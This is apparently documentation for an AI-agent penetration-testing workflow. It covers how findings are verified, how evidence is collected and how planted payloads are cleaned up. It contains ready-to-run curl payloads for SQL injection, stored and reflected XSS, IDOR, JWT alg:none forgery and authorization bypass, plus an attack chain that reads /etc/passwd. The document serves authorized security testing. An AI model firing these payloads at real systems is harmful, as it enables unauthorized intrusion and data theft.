Skip to content

Phase 5: Verification & PoC Validation

Overview

Phase 5 ensures every reported vulnerability has a working, reproducible exploit and an evidence package strong enough to survive peer review, client delivery, and bug bounty triage. Findings without working exploits are rejected and not included in the final report.

Purpose: Eliminate false positives and confirm that every reported vulnerability is real and exploitable.

The Verification Principle

CRITICAL RULE: No exploit = No report. No real evidence = no report.

Every finding created in Phase 4 must be verified: 1. Test the exact exploit steps on the live target 2. Confirm the vulnerability is real (not false positive) 3. Ask user confirmation before final inclusion 4. If exploit fails → finding rejected

For pentests, verification is not complete until the finding has the full raw HTTP request and the full raw HTTP response with complete headers and complete body, plus representative screenshots whenever the strongest proof is visual or browser-driven. For bug bounty findings, keep the PoC as fast as possible, preferably curl, and record a video of the working PoC.

This approach ensures 100% finding accuracy and credibility with the client.

Verification Flow

graph TB
    A["Phase 4 Complete<br/>N findings in findings/"] --> B["Categorize Findings<br/>Count by severity"]
    B --> C{Findings < 6?}
    C -->|Yes| D["Sequential Verify<br/>1 agent"]
    C -->|No| E["Parallel Verify<br/>3 batches, 3 agents"]
    D --> F["Build PoC<br/>curl command"]
    E --> F
    F --> G["Run Exploit<br/>Live target"]
    G --> H{Exploit Works?}
    H -->|Yes| I["Record Evidence<br/>Response, screenshot"]
    H -->|No| J["Reject Finding<br/>Log false positive"]
    I --> K["Cleanup<br/>Remove payloads"]
    K --> L["User Confirmation<br/>Include in report?"]
    J --> M["Phase 5 Complete<br/>Verified findings ready"]
    L --> M

    style A fill:#4a148c,color:#fff
    style M fill:#4a148c,color:#fff
    style I fill:#ab47bc,color:#fff
    style K fill:#ab47bc,color:#fff

Borderline Second Opinion

Verification now includes a compact Codex second-opinion path for borderline findings.

This path is used when:

  • evidence is real but not yet decisive
  • the exploit behaves inconsistently
  • Claude can reproduce some signal but not enough for a clean verdict
  • the likely issue is high-value enough that a bounded second opinion is justified

Decision Split

Step Engine Responsibility
Live exploit attempt Claude Run the PoC against the target
Borderline review Codex finding_verifier Evaluate the compact evidence bundle
Final verdict Claude Decide promote, retest, or reject

Codex does not replace live verification. It challenges assumptions and suggests whether the current evidence supports:

  • promotion to verified finding
  • downgrade to weak signal
  • one more targeted retest
  • full rejection as likely false positive

Compact Advisory Input

The borderline review is intentionally small and structured. It includes:

  • target surface
  • current hypothesis
  • concise attempt summary
  • evidence bundle
  • constraints

This keeps Codex focused on the finding itself instead of the full engagement transcript.

Expected Outcome

The intended result is fewer false positives and fewer wasted Claude tokens on repeated self-checks of the same ambiguous case.

How Findings Are Verified

1. SQLi Verification

Safe verification technique: Use SLEEP() or BENCHMARK() to confirm time-based SQLi without extracting data

# Original vulnerable parameter
curl "https://api.example.com/api/v1/users?sort=name' OR '1'='1"

# Verification: time-based
curl -w "@curl-format.txt" \
  "https://api.example.com/api/v1/users?sort=name' AND SLEEP(5) --"
# Expected: Response takes 5+ seconds

Acceptable evidence: - ✅ Time delay in response (SLEEP confirms query execution) - ✅ SELECT statement in error message (confirms SQL context) - ✅ Different output with OR 1=1 (confirms injection) - ❌ Just "error message" without confirming SQL injection

2. XSS Verification

Reflected XSS: Inject alert(document.domain) and verify JavaScript execution

# Test reflected XSS
curl "https://api.example.com/search?q=<script>alert(document.domain)</script>"

# Verify response contains the unescaped payload
grep -q "alert(document.domain)" response.html

Stored XSS: POST payload → GET to verify persistence

# Step 1: Store payload
curl -X POST "https://api.example.com/comments" \
  -d "text=<img src=x onerror=alert(1)>"

# Step 2: Verify persistence
curl "https://api.example.com/comments/123"
grep -q "onerror=alert" response.html

DOM XSS: Use Playwright MCP or browser extension to verify: - Inspect DOM for payload - Check console for errors - Visual confirmation of JavaScript execution

3. IDOR Verification

Technique: Enumerate user IDs and verify access to another user's data

# Authenticated as User A (ID 1)
curl -H "Authorization: Bearer TOKEN_USER_A" \
  "https://api.example.com/api/v1/users/2/profile"

# If User A can read User B's profile (ID 2), it's IDOR

Evidence: - ✅ Retrieved another user's PII (name, email, phone) - ✅ Modified another user's data - ✅ Deleted another user's resource - ❌ Got 200 response (but endpoint doesn't return sensitive data)

4. Broken Authentication Verification

JWT Algorithm Confusion:

# Original token
ORIGINAL_TOKEN="eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9..."

# Craft token with alg: "none"
NONE_TOKEN="eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.payload."

# Verify it's accepted
curl -H "Authorization: Bearer $NONE_TOKEN" \
  "https://api.example.com/api/v1/admin"

# If 200 response (not 401), authentication is broken

5. Authorization Bypass Verification

Test: Low-privilege user accessing high-privilege functions

# Authenticate as "User" role (lowest privilege)
curl -H "Authorization: Bearer USER_TOKEN" \
  "https://api.example.com/api/v1/admin/users/delete?id=999"

# If 200/204 (user deleted), authz is bypassed
# If 403 (forbidden), authz is enforced

Evidence Collection

For each verified finding, collect:

1. Full HTTP Request (Pentest Standard)

POST /api/v1/users HTTP/1.1
Host: api.example.com
Authorization: Bearer eyJhbG...
Content-Type: application/json

{"email":"test' OR '1'='1","role":"admin"}

2. Full HTTP Response (Pentest Standard)

HTTP/1.1 200 OK
Content-Type: application/json
X-Request-Id: 8f3a1b2c

{"users":[{"id":1,"email":"admin@example.com","role":"admin"},...]}

Store the complete response by default. Do not truncate headers or body unless you are performing minimal redaction of secrets or non-essential sensitive data.

3. Response Indicator (What proves the vuln)

Evidence: Response includes admin user in results when authenticated as non-admin user

4. Baseline (What the response should be)

Baseline: Response should only include users accessible to authenticated user's role

5. Representative Screenshot (When Relevant)

Capture a screenshot whenever the strongest proof is visual or browser-driven, for example: - XSS or stored XSS dialog / rendered payload - Authorization bypass visible in UI - Sensitive data exposure rendered in page context - Stored payload appearing for another role or another user

Screenshots must be representative, not decorative. A screenshot does not replace the raw HTTP evidence; it complements it.

6. Bug Bounty Only: Working-PoC Video

For bug bounty findings, record a video that shows: - the real target - the exact steps or the rapid curl PoC - the exploit succeeding live - the visible or observable impact

Bug bounty submissions without a working-PoC video are not submission-ready.

All collected in FINDING-NNN.md:

## Evidence

**HTTP Request:**
```http
POST /api/v1/users HTTP/1.1
...

HTTP Response:

HTTP/1.1 200 OK
...

Response Indicator: Response contains admin users when accessed as regular user

Baseline: Should return 403 Forbidden or empty user list for non-admin users

For pentests, this exact evidence package must propagate into HedgeDoc/Outline notes and the generated `.docx` report. The report is not allowed to downgrade full HTTP evidence into prose-only summaries.

## Parallel Verification (6+ Findings)

When there are 6 or more findings, verify in parallel to save time:

```bash
# Batch 1 (agents 1-2): SQLi, XSS findings
# Batch 2 (agents 3-4): IDOR, Auth findings
# Batch 3 (agents 5-6): Logic, Infrastructure findings

# Run in parallel
claude -p < batch1.prompt > batch1-results.log &
claude -p < batch2.prompt > batch2-results.log &
claude -p < batch3.prompt > batch3-results.log &
wait

Batches consolidated after all complete.

Payload Cleanup (CRITICAL)

After evidence collection, ALL persistent payloads must be removed from the target:

Stored XSS Cleanup

# Payload was: <img src=x onerror=alert(1)>

curl -X PUT "https://api.example.com/comments/123" \
  -d "text=Cleaned up payload"

# Verify removal
curl "https://api.example.com/comments/123" | grep -q "alert(1)"
# Should return: "No" (payload removed)

Applies to: - Stored XSS in comments, profiles, messages - Stored SSTI in templates - Stored CRLF in headers - Uploaded files (delete after screenshot)

Finding Record

{
  "finding_id": "FINDING-001",
  "cleanup_status": "cleaned",
  "cleanup_evidence": {
    "timestamp": "2026-03-13T14:35:00Z",
    "verified_removed": true
  }
}

User Confirmation Workflow

Before final inclusion in report, ask user for each finding:

Found: SQL Injection in /api/v1/users?sort=
Severity: HIGH
PoC: curl "https://api.example.com/api/v1/users?sort=name' AND SLEEP(5)"
Expected: Response delays 5+ seconds
Actual: Response delayed 5.2 seconds ✓

Include in report? (yes/no)

User can: - ✅ yes: Include in report - ❌ no: Exclude (e.g., "client wants to test this themselves") - 🔍 re-verify: Run exploit again - 📝 adjust: Change severity/description

Verification Failure Handling

If exploit fails:

Finding: IDOR on /api/v1/users/{id}
Expected: Can access user 999 as user 1
Attempted: curl -H "Authorization: Bearer TOKEN_1" "https://api.example.com/api/v1/users/999"
Result: HTTP 403 Forbidden (Access Denied)

Conclusion: User correctly denied access → NOT VULNERABLE (False Positive)
Action: Remove from report

Common False Positives

Scenario Issue Solution
IDOR on /users/{id} returns 403 Access control is working False positive → remove
SQLi detected but returns same data Query doesn't change results Verify with time-based SQLi
XSS payload in response but HTML-escaped Escaping prevents execution False positive → remove
Auth bypass attempt rejected Authorization properly enforced False positive → remove

Chain Detection

After verifying individual findings, /chain-findings correlates them into attack chains:

Example Chain:
├── Finding: SQLi on /api/v1/reports?sort=
├── Finding: LFI on /api/v1/reports/export?filename=
└── Chain: SQLi → extract admin email → LFI via filename injection → read /etc/passwd

Each chain gets a CHAIN-NNN.md file with execution steps.

Verification Statistics

After Phase 5: - Verified findings: X (with working exploits) - Rejected findings: Y (false positives) - Cleanup status: All persistent payloads removed - User confirmations: X/X (all approved)

Next Phase

After Phase 5 completes with all findings verified and cleaned up, proceed to Phase 6: Report to generate the professional penetration test report.